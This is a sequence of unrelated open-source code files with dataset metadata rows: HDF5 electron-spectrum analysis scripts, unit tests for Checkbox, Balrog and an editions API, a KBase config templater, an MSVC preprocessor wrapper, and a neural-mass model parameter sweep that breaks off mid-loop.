spectral_center_dset[i_evt] = center
width = t_end - t_start
spectral_width_dset[i_evt] = width
# Calculate center of mass
peak_sl = slice(energy_scale.searchsorted(t_start - width/2),
energy_scale.searchsorted(t_end + width/2,
side='right'))
peak_trace = energy_trace[peak_sl]
peak_scale = energy_scale[peak_sl]
# spectral_com_dset[i_evt] = (np.sum(peak_scale * peak_trace) /
# np.sum(peak_trace))
if len(peak_trace) > 3:
out = model.fit(peak_trace, x=peak_scale,
center=center, sigma=width/4,
amplitude=peak_trace.max() * width / 2)
spectral_gaussian_center_dset[i_evt] = out.values['center']
else:
spectral_gaussian_center_dset[i_evt] = np.nan
update_progress(i_evt, n_events, verbose)
spectral_center_dset.attrs['time_stamp'] = time.time()
spectral_width_dset.attrs['time_stamp'] = time.time()
spectral_threshold_dset.attrs['time_stamp'] = time.time()
spectral_gaussian_center_dset.attrs['time_stamp'] = time.time()
if plot:
selected_shots = list(np.linspace(0, n_events, 16, endpoint=False))
plt.figure('peak properties')
plt.clf()
_, ax_list = plt.subplots(4, 4, sharex=True, sharey=True,
num='peak properties')
energy_scale = energy_scale_dset[:]
sl = slice(np.searchsorted(energy_scale, 75),
np.searchsorted(energy_scale, 130))
energy_scale = energy_scale[sl]
for i, shot in enumerate(selected_shots):
energy_trace = energy_trace_dset[shot, :]
ax = ax_list.flatten()[i]
# plt.plot(energy_scale - pe_energy_prediction_dset[shot],
ax.plot(energy_scale, energy_trace[sl])
c = spectral_center_dset[shot]
w = spectral_width_dset[shot]
th = spectral_threshold_dset[shot]
ax.plot([c-w/2, c+w/2], [th] * 2)
# Calculate main photoline area
main_photoline_area = make_dataset(spectral_properties_group,
'main_photoline_area', (n_events, ))
if older(main_photoline_area, energy_trace_dset):
if verbose:
print 'Computing photoline area'
e_scale = energy_scale_dset.value
dE = np.mean(np.diff(e_scale))
e_slice = slice(np.searchsorted(e_scale, 55), None)
for i_evt in range(n_events):
raw_A, _ = area_fill.zero_crossing_area(
energy_trace_dset[i_evt, e_slice])
main_photoline_area[i_evt] = raw_A * dE
update_progress(i_evt, n_events, verbose)
time_stamp_object(main_photoline_area)
##########
# Calculate electron energy prediction
e_energy_prediction_params_group = make_group(h5,
'e_energy_prediction_params')
if older(e_energy_prediction_params_group, [spectral_gaussian_center_dset,
Timer_object(1444931900)]):
if verbose > 0:
print 'Fit the electron energy prediction parameters.',
print 'In "update_with_time_to_energy_conversion()"',
print 'with {}'.format(file_name)
selection = np.isfinite(spectral_gaussian_center_dset.value)
# &
# (0.4 < raw_group['phase_cavity_times'][:, 0]) &
# (raw_group['phase_cavity_times'][:, 0] < 1.1))
spectral_gaussian_center = spectral_gaussian_center_dset[selection]
if len(spectral_gaussian_center) == 0:
return
var_dict = {
'l3_energy': raw_group['energy_L3_MeV'][selection],
'bc2_energy': h5['energy_BC2_MeV'][selection],
# 'fee': h5['fee_mean'][selection],
'e_energy': spectral_gaussian_center
}
prediction_params = \
tof_to_energy.e_energy_prediction_model_start_params(**var_dict)
try:
res = lmfit.minimize(tof_to_energy.e_energy_prediction_model,
prediction_params,
kws=var_dict)
fit_worked = True
except:
fit_worked = False
if verbose > 0 and fit_worked:
print '\nPrediction params:'
lmfit.report_fit(res)
# Create or update the parameters from the fit in the group
for k, v in prediction_params.iteritems():
d = e_energy_prediction_params_group.require_dataset(
k, (), np.float)
d[()] = v.value if fit_worked else np.nan
# Remove old parameters that should not be there
for k in set(e_energy_prediction_params_group.keys()).difference(
set(prediction_params.keys())):
del e_energy_prediction_params_group[k]
e_energy_prediction_params_group.attrs[time_stamp] = time.time()
if plot:
deviation = tof_to_energy.e_energy_prediction_model(
prediction_params, **var_dict)
plt.figure('e energy prediction {}'.format(
h5.filename.split('/')[-1]))
plt.clf()
plt.subplot(221)
# plt.plot(spectral_gaussian_center, deviation, '.')
plt.scatter(spectral_gaussian_center, deviation,
s=4, c=h5['energy_BC2_MeV'][selection],
linewidths=(0,), alpha=1)
plt.xlabel('electron energy (eV)')
plt.ylabel('prediction residual (eV)')
x_range = plt.xlim()
y_range = plt.ylim()
img, _, _ = np.histogram2d(spectral_gaussian_center, deviation,
bins=2**7, range=[x_range, y_range])
img = img.T
plt.subplot(222)
plt.imshow(img, aspect='auto', interpolation='none',
origin='lower', extent=x_range + y_range)
hist, hist_edges = np.histogram(deviation,
bins=2**5, range=(-3, 3))
hist_centers = (hist_edges[: -1] + hist_edges[1:])/2
plt.subplot(223)
gauss_model = lmfit.models.GaussianModel()
fit_out = gauss_model.fit(hist, x=hist_centers)
lmfit.report_fit(fit_out)
plt.bar(hist_edges[:-1], hist, width=np.diff(hist_edges))
plt.plot(hist_centers, fit_out.best_fit, 'r', linewidth=2)
plt.subplot(224)
plt.plot(spectral_gaussian_center, h5['energy_BC2_MeV'][selection],
'.')
def update_with_energy_prediction(file_name, plot=False, verbose=0):
update_with_time_to_energy_conversion(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
prediction_map = {'117': 'h5_files/run118_all.h5',
'114': 'h5_files/run115_all.h5',
'113': 'h5_files/run112_all.h5',
'108': 'h5_files/run109_all.h5',
'101': 'h5_files/run100_all.h5',
'102': 'h5_files/run100_all.h5'}
pe_energy_prediction_dset = make_dataset(
h5, 'photoelectron_energy_prediction_eV', (n_events,))
spectral_properties_group = h5['spectral_properties']
# spectral_gaussian_center_dset = spectral_properties_group[
# 'gaussian_center']
fee_dset = h5['fee_mean']
energy_BC2_dset = h5['energy_BC2_MeV']
energy_L3_dset = raw_group['energy_L3_MeV']
for k, v in prediction_map.iteritems():
if k in file_name:
update_with_time_to_energy_conversion(v, plot=False,
verbose=verbose-1)
ref_h5 = open_hdf5_file(v)  # the reference run mapped above, not the file being processed
e_energy_prediction_params_group = \
ref_h5['e_energy_prediction_params']
break
else:
e_energy_prediction_params_group = h5['e_energy_prediction_params']
if older(pe_energy_prediction_dset, [e_energy_prediction_params_group,
fee_dset,
energy_BC2_dset,
raw_group,
Timer_object(1444981500)]):
if verbose > 0:
print 'Updating energy prediction.',
print ' In "update_with_energy_prediction()" with {}'.format(
file_name)
prediction_params = lmfit.Parameters()
for k in e_energy_prediction_params_group:
prediction_params.add(k, e_energy_prediction_params_group[k][()])
var_dict = {
'l3_energy': energy_L3_dset.value,
'bc2_energy': energy_BC2_dset.value,
'fee': fee_dset.value
}
try:
pe_energy_prediction_dset[:] = \
tof_to_energy.e_energy_prediction_model(prediction_params,
**var_dict)
except:
pe_energy_prediction_dset[:] = np.nan
pe_energy_prediction_dset.attrs[time_stamp] = time.time()
##########
# Make the christmas three histogram
n_spectral_center_bins = 2**7
n_spectral_width_bins = 2**7
spectral_center_axis_dset = make_dataset(spectral_properties_group,
'center_axis_eV',
(n_spectral_center_bins, ))
spectral_width_axis_dset = make_dataset(spectral_properties_group,
'width_axis_eV',
(n_spectral_width_bins, ))
spectral_histogram_dset = make_dataset(spectral_properties_group,
'histogram',
(n_spectral_width_bins,
n_spectral_center_bins))
spectral_center_dset = spectral_properties_group['center_eV']
spectral_width_dset = spectral_properties_group['width_eV']
pct_filter_dset = h5['pct_filter']
if older(spectral_histogram_dset, [spectral_center_dset,
spectral_width_dset,
pe_energy_prediction_dset,
pct_filter_dset,
Timer_object(2444203160)]):
if verbose > 0:
print 'Making the christmas tree plot.',
print ' In "update_with_energy_prediction()"',
print ' with {}'.format(file_name)
spectral_width_axis_dset[:] = np.linspace(0, 35, n_spectral_width_bins)
spectral_width_axis_dset.attrs['time_stamp'] = time.time()
spectral_center_axis_dset[:] = np.linspace(-20, 20,
n_spectral_center_bins)
spectral_center_axis_dset.attrs['time_stamp'] = time.time()
# I = (pct_filter_dset.value &
# (-0.1 < raw_group['phase_cavity_times'][:, 1]) &
## (raw_group['phase_cavity_times'][:, 1] < 0.05) &
## (0.75 < raw_group['phase_cavity_times'][:, 0]) &
## (raw_group['phase_cavity_times'][:, 0] < 0.85) &
# (0.065 < raw_group['power_meter_V'].value) &
# (raw_group['power_meter_V'].value < 0.1))
I = np.ones(pct_filter_dset.shape, dtype=bool)
hist = aol_plotting.center_histogram_2d(
spectral_center_dset[I] - pe_energy_prediction_dset[I],
spectral_width_dset[I],
spectral_center_axis_dset[:],
spectral_width_axis_dset[:])
hist[hist == 0] = np.nan
spectral_histogram_dset[:] = hist
spectral_histogram_dset.attrs['time_stamp'] = time.time()
if plot:
plt.figure('christmas tree {}'.format(h5.filename.split('/')[-1]))
plt.clf()
plt.imshow(spectral_histogram_dset[:], aspect='auto',
interpolation='none', origin='lower',
extent=(np.min(spectral_center_axis_dset),
np.max(spectral_center_axis_dset),
np.min(spectral_width_axis_dset),
np.max(spectral_width_axis_dset)))
plt.xlabel('center (eV)')
plt.ylabel('width (eV)')
plt.colorbar()
plt.savefig('figures/christmas_tree_{}.png'.format(
h5.filename.split('/')[-1].split('.')[0]))
h5.close()
def load_file(file_name, plot=False, verbose=0):
""" Load file and make sure it is up to date."""
# if verbose > 0:
# print 'Entering "load_file()" with file_name={}'.format(file_name)
update_with_energy_prediction(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
if verbose > 0:
print 'File {} processed.'.format(h5.file)
print 'It contains', n_events, 'events.'
if verbose > 1:
list_hdf5_content(h5)
return h5
def touch_all_files(verbose=2):
file_names = ['/'.join([data_dir, f]) for f in os.listdir(data_dir) if
f.startswith('run') and f.endswith('_all.h5')]
for name in file_names:
load_file(name, verbose=verbose)
if __name__ == '__main__':
# Parse the command line.
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--hdf5_file', type=str,
default='h5_files/run108_all.h5',
help='Path to hdf5 file to process')
parser.add_argument('--plot', action='store_true',
help='Display plots. Default: no plots.')
parser.add_argument('-v', '--verbose', action='count',
help='increase output verbosity')
args = parser.parse_args()
# Unpack the parser arguments.
hdf5_file = args.hdf5_file
plot = args.plot
verbose = args.verbose
# If plotting is requested, run pyplot in interactive mode.
if plot:
plt.ion()
if verbose > 0:
print 'Get the noise spectrum just to make sure it is up to date.'
get_nois_spectrum(plot=plot, verbose=verbose)
# Load the given file.
if verbose > 0:
print 'Load the requested file: {}'.format(hdf5_file)
h5 = load_file(hdf5_file, verbose=verbose, plot=plot)
# Get the raw group of the file.
raw_group = h5['raw']
# Number of events in the file.
n_events = len(raw_group['event_time_s'])
# Time-trace related information.
raw_time = raw_group['time_scale'].value
raw_traces_dset = raw_group['time_signal']
filtered_traces = h5['filtered_time_signal']
# Pulse energy
raw_fee_dset = raw_group['FEE_energy_mJ']
n_fee = raw_fee_dset.shape[1]
# frequency domain
freq_axis = h5['fft_freq_axis'].value
fft_mean = h5['fft_spectrum_mean'].value
snr = h5['snr_spectrum'].value
if plot and False:
if verbose > 0:
print 'Plotting fee correlations.'
plt.figure('fee')
plt.clf()
ax = None
for i in range(n_fee):
for k in range(n_fee):
ax = plt.subplot(n_fee, n_fee, i + k*n_fee + 1,
sharex=ax, sharey=ax)
ax.plot(raw_fee_dset[:, i], raw_fee_dset[:, k], '.')
if i > 0:
plt.setp(ax.get_yticklabels(), visible=False)
if k < n_fee-1:
plt.setp(ax.get_xticklabels(), visible=False)
plt.xlim(xmin=0)
plt.ylim(ymin=0)
if verbose > 0:
print 'Plotting fee histogram.'
plt.figure('fee histogram')
plt.clf()
plt.hist(h5['fee_mean'].value, bins=100)
if plot:
if verbose > 0:
print 'Plot signal maximum histogram.'
plt.figure('signal hist')
plt.clf()
plt.hist(h5['max_signal'], bins=100)
if plot:
if verbose > 0:
print 'Plot the spectra.'
plt.figure('fft')
plt.clf()
plt.semilogy(freq_axis, fft_mean, label='average spectrum')
plt.semilogy(freq_axis, snr, label='snr')
plt.legend(loc='best')
# Plot some traces
if plot:
if verbose > 0:
print 'Plotting traces'
trace_fig = plt.figure('traces {}'.format(hdf5_file))
trace_fig.clf()
raw_mean_tr = raw_traces_dset.value.mean(0)
deconv_mean_tr = filtered_traces.value.mean(0)
rand_event = np.random.randint(n_events)
response, _ = get_response(plot=False, verbose=verbose)
plt.plot(raw_time, raw_traces_dset[rand_event, :],
label='single trace')
plt.plot(raw_time, filtered_traces[rand_event, :],
label='Deconv single trace')
plt.plot(raw_time, raw_mean_tr, label='mean trace')
plt.plot(raw_time, deconv_mean_tr,
label='Deconv mean')
plt.legend(loc='best')
# Plot the phase cavity times
pct = raw_group['phase_cavity_times']
plt.figure('Phase cavity times')
plt.clf()
# pc_selection = (np.isfinite(np.sum(pct, axis=1)) &
# (pct[:, 0] > -2) & (pct[:, 0] < 2) &
# (pct[:, 1] > -2) & (pct[:, 1] < 2))
# (pct[:, 0] > -50) & (pct[:, 0] < 50))
pc_selection = h5['pct_filter'].value
for i in range(2):
plt.subplot(1, 3, i+1)
plt.title('Time {}'.format(i))
hist, hist_edges = np.histogram(pct[pc_selection, i], bins=100)
plt.bar(hist_edges[: -1], hist, width=np.diff(hist_edges))
plt.subplot(133)
plt.plot(pct[pc_selection, 0], pct[pc_selection, 1], '.')
# Plot energy traces and photon energy diagnostics
pe_energy_dset = h5['photoelectron_energy_prediction_eV']
energy_scale = h5['energy_scale_eV'][:]
energy_signal_dset = h5['energy_signal']
selected_shots = np.linspace(0, n_events, 100, endpoint=False, dtype=int)
plt.figure('Energy spectra')
plt.clf()
ax1 = plt.subplot(121)
ax2 = plt.subplot(122)
dy = 1e-5
for i, shot in enumerate(selected_shots):
ax1.plot(energy_scale, energy_signal_dset[shot, :] + dy * i)
ax2.plot(energy_scale - pe_energy_dset[shot],
energy_signal_dset[shot, :] + dy * i)
ax2.set_xlim(-20, 25)
# %%
# Plot the photoline area
plt.figure('photoline area')
plt.clf()
spectral_properties_group = h5['spectral_properties']
main_photoline_area = spectral_properties_group[
'main_photoline_area'].value
fee = h5['fee_mean'].value
I = np.isfinite(main_photoline_area) & np.isfinite(fee)
p = np.polyfit(fee[I], main_photoline_area[I], 2)
fee_ax = np.linspace(min(fee[I]), max(fee[I]), 2**5)
plt.subplot(121)
plt.plot(fee, main_photoline_area, '.')
plt.plot(fee_ax, np.polyval(p, fee_ax), 'r')
plt.subplot(122)
plt.hist2d(fee[I], main_photoline_area[I], bins=2**7)
plt.plot(fee_ax, np.polyval(p, fee_ax), 'r')
|
gpl-2.0
| 6,914,218,429,216,574,000 | 37.523372 | 79 | 0.554571 | false |
jds2001/ocp-checkbox
|
plainbox/plainbox/impl/providers/test_checkbox.py
|
1
|
1330
|
# This file is part of Checkbox.
#
# Copyright 2012, 2013 Canonical Ltd.
# Written by:
# Zygmunt Krynicki <zygmunt.krynicki@canonical.com>
#
# Checkbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Checkbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Checkbox. If not, see <http://www.gnu.org/licenses/>.
"""
plainbox.impl.test_checkbox
===========================
Test definitions for plainbox.impl.checkbox module
"""
from plainbox.impl.providers.checkbox import CheckBoxAutoProvider
from plainbox.testing_utils.testcases import TestCaseWithParameters
class TestCheckBox(TestCaseWithParameters):
parameter_names = ('job',)
@classmethod
def get_parameter_values(cls):
for job in CheckBoxAutoProvider().get_builtin_jobs():
yield (job,)
def test_job_resource_expression(self):
self.parameters.job.get_resource_program()
|
gpl-3.0
| -1,121,494,862,318,903,400 | 32.25 | 70 | 0.734586 | false |
tieu/balrog
|
auslib/test/admin/views/test_history.py
|
1
|
7025
|
import json
from auslib.global_state import dbo
from auslib.test.admin.views.base import ViewTest
class TestHistoryView(ViewTest):
def testFieldViewBadValuesBadTable(self):
url = '/history/view/notatable/1/whatever'
ret = self.client.get(url)
self.assertStatusCode(ret, 400)
self.assertTrue('Bad table' in ret.data)
def testFieldViewBadValuesBadChangeId(self):
url = '/history/view/permission/9999/whatever'
ret = self.client.get(url)
self.assertStatusCode(ret, 404)
self.assertTrue('Bad change_id' in ret.data)
def testFieldViewCheckIntegerValue(self):
data = json.dumps(dict(detailsUrl='InbhalInt', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
query = table.t.count()
count, = query.execute().first()
self.assertEqual(count, 1)
row, = table.select()
change_id = row['change_id']
url = '/history/view/release/%d/data_version' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
def testFieldViewBadValuesBadField(self):
ret = self._put('/users/bob/permissions/admin', data=dict(options=json.dumps(dict(products=["a"]))))
self.assertStatusCode(ret, 201)
table = dbo.permissions.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/view/permission/%d/notafield' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 400)
self.assertTrue('Bad field' in ret.data)
def testFieldViewRelease(self):
# add a release
data = json.dumps(dict(detailsUrl='blah', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
query = table.t.count()
count, = query.execute().first()
self.assertEqual(count, 1)
row, = table.select()
change_id = row['change_id']
url = '/history/view/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertEqual(json.loads(ret.data), json.loads("""
{
"name": "d",
"schema_version": 1,
"detailsUrl": "blah",
"fakePartials": true,
"hashFunction": "sha512",
"platforms": {
"p": {
"locales": {
"d": {
"complete": {
"filesize": 1234,
"from": "*",
"hashValue": "abc"
}
}
}
}
}
}
"""))
data = json.dumps(dict(detailsUrl='blah', fakePartials=False, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
def testFieldViewDiffRelease(self):
# Add release history for d
data = json.dumps(dict(detailsUrl='blahblah', fakePartials=False, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
        # Let's add a separate release, say for b (already present in the setUp)
data = json.dumps(dict(detailsUrl='blahagain', fakePartials=True, schema_version=1, name="b", hashFunction="sha512"))
ret = self._post(
'/releases/b',
data=dict(data=data, product='b', data_version=1)
)
self.assertStatusCode(ret, 200)
# Let's add another release history for d
data = json.dumps(dict(detailsUrl='blahblahblah', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
# Checks should give diff for versions of d
self.assertTrue('"detailsUrl": "blahblahblah"' in ret.data)
self.assertTrue('"detailsUrl": "blahblah"' in ret.data)
self.assertFalse('"detailsUrl": "blahagain"' in ret.data)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
# Add another version for b
data = json.dumps(dict(detailsUrl='blahagainblahagain', fakePartials=False, schema_version=1, name="b", hashFunction="sha512"))
ret = self._post(
'/releases/b',
data=dict(data=data, product='b', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
# Checks should now give diff for versions of b
self.assertTrue('"detailsUrl": "blahagainblahagain"' in ret.data)
self.assertTrue('"detailsUrl": "blahagain"' in ret.data)
self.assertFalse('"detailsUrl": "blahblahblah"' in ret.data)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
def testFieldViewPermission(self):
# Add a permission
ret = self._put('/users/bob/permissions/admin', data=dict(options=json.dumps(dict(products=["a"]))))
self.assertStatusCode(ret, 201)
table = dbo.permissions.history
row, = table.select(order_by=[table.timestamp.desc()], limit=1)
change_id = row['change_id']
url = '/history/view/permission/%d/options' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertEqual(json.loads(ret.data), {"products": ["a"]})
|
mpl-2.0
| -1,618,251,931,530,158,600 | 36.169312 | 135 | 0.593452 | false |
kbaseapps/kb_phylogenomics
|
scripts/prepare_deploy_cfg.py
|
1
|
1496
|
import sys
import os
import os.path
from jinja2 import Template
try:
from ConfigParser import ConfigParser # py2
except:
from configparser import ConfigParser # py3
try:
    import StringIO  # py2
except ImportError:
    import io as StringIO  # py3
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: <program> <deploy_cfg_template_file> <file_with_properties>")
print("Properties from <file_with_properties> will be applied to <deploy_cfg_template_file>")
print("template which will be overwritten with .orig copy saved in the same folder first.")
sys.exit(1)
file = open(sys.argv[1], 'r')
text = file.read()
t = Template(text)
config = ConfigParser()
if os.path.isfile(sys.argv[2]):
config.read(sys.argv[2])
elif "KBASE_ENDPOINT" in os.environ:
kbase_endpoint = os.environ.get("KBASE_ENDPOINT")
props = "[global]\n" + \
"job_service_url = " + kbase_endpoint + "/userandjobstate\n" + \
"workspace_url = " + kbase_endpoint + "/ws\n" + \
"shock_url = " + kbase_endpoint + "/shock-api\n" + \
"kbase_endpoint = " + kbase_endpoint + "\n"
config.readfp(StringIO.StringIO(props))
else:
raise ValueError('Neither ' + sys.argv[2] + ' file nor KBASE_ENDPOINT env-variable found')
props = dict(config.items("global"))
output = t.render(props)
with open(sys.argv[1] + ".orig", 'w') as f:
f.write(text)
with open(sys.argv[1], 'w') as f:
f.write(output)
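# Hedged usage sketch (file names below are hypothetical, not from the repo):
#   python prepare_deploy_cfg.py deploy.cfg deploy.cfg.properties
# If the properties file does not exist but KBASE_ENDPOINT is set in the
# environment, the service URLs are derived from that endpoint instead, and
# the original template is preserved as deploy.cfg.orig next to the output.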
|
mit
| -3,337,510,685,604,075,000 | 38.368421 | 101 | 0.601604 | false |
anthrotype/gobject-introspection
|
giscanner/msvccompiler.py
|
1
|
3827
|
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2014 Chun-wei Fan
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
import distutils
import distutils.msvccompiler
import distutils.msvc9compiler
from distutils.errors import (DistutilsExecError, CompileError, LibError,
LinkError, UnknownFileError)
from distutils.ccompiler import CCompiler, gen_preprocess_options
from distutils.dep_util import newer
# Distutils' MSVCCompiler does not provide a preprocess()
# implementation, so do our own here.
def get_msvc_compiler():
return MSVCCompiler()
class MSVCCompiler(distutils.msvccompiler.MSVCCompiler):
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__(self, verbose, dry_run, force)
self.__paths = []
self.__arch = None # deprecated name
if os.name == 'nt':
if isinstance(self, distutils.msvc9compiler.MSVCCompiler):
self.__version = distutils.msvc9compiler.VERSION
self.initialized = False
self.preprocess_options = None
def preprocess(self,
source,
output_file=None,
macros=None,
include_dirs=None,
extra_preargs=None,
extra_postargs=None):
if self.initialized is False:
self.initialize()
(_, macros, include_dirs) = \
self._fix_compile_args(None, macros, include_dirs)
pp_opts = gen_preprocess_options(macros, include_dirs)
preprocess_options = ['-E']
source_basename = None
if output_file is not None:
preprocess_options.append('-P')
source_basename = self._get_file_basename(source)
cpp_args = self.cc.split()
if extra_preargs is not None:
cpp_args[:0] = extra_preargs
if extra_postargs is not None:
preprocess_options.extend(extra_postargs)
cpp_args.extend(preprocess_options)
cpp_args.extend(pp_opts)
cpp_args.append(source)
# We need to preprocess: either we're being forced to, or the
# source file is newer than the target (or the target doesn't
# exist).
if self.force or output_file is None or newer(source, output_file):
try:
self.spawn(cpp_args)
            except DistutilsExecError as msg:
print(msg)
raise CompileError
# The /P option for the MSVC preprocessor will output the results
# of the preprocessor to a file, as <source_without_extension>.i,
# so in order to output the specified filename, we need to rename
# that file
if output_file is not None:
if output_file != source_basename + '.i':
os.rename(source_basename + '.i', output_file)
def _get_file_basename(self, filename):
if filename is None:
return None
if filename.rfind('.') == -1:
return filename[filename.rfind('\\') + 1:]
else:
return filename[filename.rfind('\\') + 1:filename.rfind('.')]
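# Hedged usage sketch (not part of the original module): exercises the
# preprocess() implementation above. The source file name and macro value are
# made up, and an installed MSVC toolchain is assumed.
if __name__ == '__main__':
    compiler = get_msvc_compiler()
    # MSVC's /P switch writes the preprocessed output as <source>.i;
    # preprocess() then renames that file to the requested output_file.
    compiler.preprocess('scannerparser.c',
                        output_file='scanner.i',
                        macros=[('G_OS_WIN32', '1')],
                        include_dirs=['.'])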
|
gpl-2.0
| 5,496,914,266,710,373,000 | 36.891089 | 75 | 0.628691 | false |
oser-cs/oser-website
|
tests/test_projects/test_edition_api.py
|
1
|
2146
|
"""Editions API tests."""
from rest_framework import status
from tests.utils import SimpleAPITestCase, logged_in
from projects.factory import EditionFactory, EditionFormFactory
class EditionEndpointsTest(SimpleAPITestCase):
"""Test access to the editions endpoints."""
factory = EditionFactory
read_expected_fields = {'id', 'url', 'name', 'year', 'project',
'description', 'organizers', 'participations',
'edition_form', 'participates'}
def setUp(self):
self.factory.create_batch(3)
def perform_list(self):
url = '/api/editions/'
response = self.client.get(url)
return response
def perform_retrieve(self, obj=None):
if obj is None:
obj = self.factory.create()
url = '/api/editions/{obj.pk}/'.format(obj=obj)
response = self.client.get(url)
return response
def test_list_requires_authentication(self):
self.assertRequiresAuth(
self.perform_list, expected_status_code=status.HTTP_200_OK)
@logged_in
def test_list_returns_expected_fields(self):
response = self.perform_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
fields = set(response.data[0])
self.assertSetEqual(fields, self.read_expected_fields)
def test_retrieve_requires_authentication(self):
self.assertRequiresAuth(
self.perform_retrieve, expected_status_code=status.HTTP_200_OK)
@logged_in
def test_retrieve_returns_expected_fields(self):
response = self.perform_retrieve()
self.assertEqual(response.status_code, status.HTTP_200_OK)
fields = set(response.data)
self.assertSetEqual(fields, self.read_expected_fields)
@logged_in
def test_list_open_registrations(self):
edition = self.factory.create()
EditionFormFactory.create(edition=edition)
url = '/api/editions/open_registrations/'
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
|
gpl-3.0
| 2,580,680,813,170,450,000 | 33.612903 | 75 | 0.653774 | false |
TiKunze/CanMics
|
src/python/01_SingleChannel/3pop/EIN/HeHiVariation/RUM_Detektor_HeHi_2ndversion_cluster.py
|
1
|
5917
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 17:15:03 2015
@author: Tim Kunze
Copyright (C) 2015, Tim Kunze. All rights reserved.
This script is a modified version of the RUM Detector:
instead of sweeping over He and Hi in every diagram, we sweep over length and intensity of the impulse (as in the activation plot)
"""
###############################################################################
#
# Imports
#
###############################################################################
import numpy as np
import sys
import scipy as sc
import os  # to enable some OS commands (cwd, listdir)
currpath = '/usr/wrk/people9/tiku2449/EI_RUM/001_Unifying_Framework/RUM_Exploration'
os.chdir(currpath)
import sys
sys.path.append("/usr/wrk/people9/tiku2449/EI_RUM/001_Unifying_Framework")
import Models.JuRClass_fin_006 as FCV
import Simulation_And_Analysis.Sim_Simulation_003 as simulate
while len(sys.argv) > 1:
option = sys.argv[1]; del sys.argv[1]
if option == '-he': he = float(sys.argv[1].replace(',','.')); del sys.argv[1]
elif option == '-hi': hi = float(sys.argv[1].replace(',','.')); del sys.argv[1]
else:
        print 'Invalid option:', option, '->', sys.argv[0]
#%%
###############################################################################
#
# Main
#
###############################################################################
dt = 1000e-6
JR = FCV.JuR()
JR.integ_stepsize = dt
JR.n=2
JR.coupling = np.array([[0.0,0.0],[0.0,0.0]]) #
JR.distanceMatrix = np.array([[0.0,0.01],[0.0,0.0]]) # important!!
JR.init = np.zeros((8,JR.n))
JR.c_e=0 # only relevant for connected areas
JR.c_i=0 # only relevant for connected areas
JR.c_py=30 # only relevant for connected areas
JR.configure()
#%%
###############################################################################
#
## Activation Diagram RUM with modulation of input to II
#
###############################################################################
t_simulation = 5
N=t_simulation/dt
time = np.arange(0,N*dt,dt)
JR.H_e=he
JR.H_i=hi
p_sim_py = np.zeros((N,JR.n))
p_sim_e = np.zeros((N,JR.n))
p_sim_i = np.zeros((N,JR.n))
length_range = np.arange(500,1501,10)
intensity_range = np.arange(50,251,2)
state_grid = np.zeros((len(intensity_range),len(length_range),3))
i=0
j=0
for ins in intensity_range:
j=0
for le in length_range:
p_sim_e = np.zeros((N,JR.n))
p_sim_e[1000:1000+le,:] = ins
signal,sig_ei,sig_ii,impact,data = simulate.simulate_network_006(JR,p_sim_py,p_sim_e,p_sim_i,t_simulation)
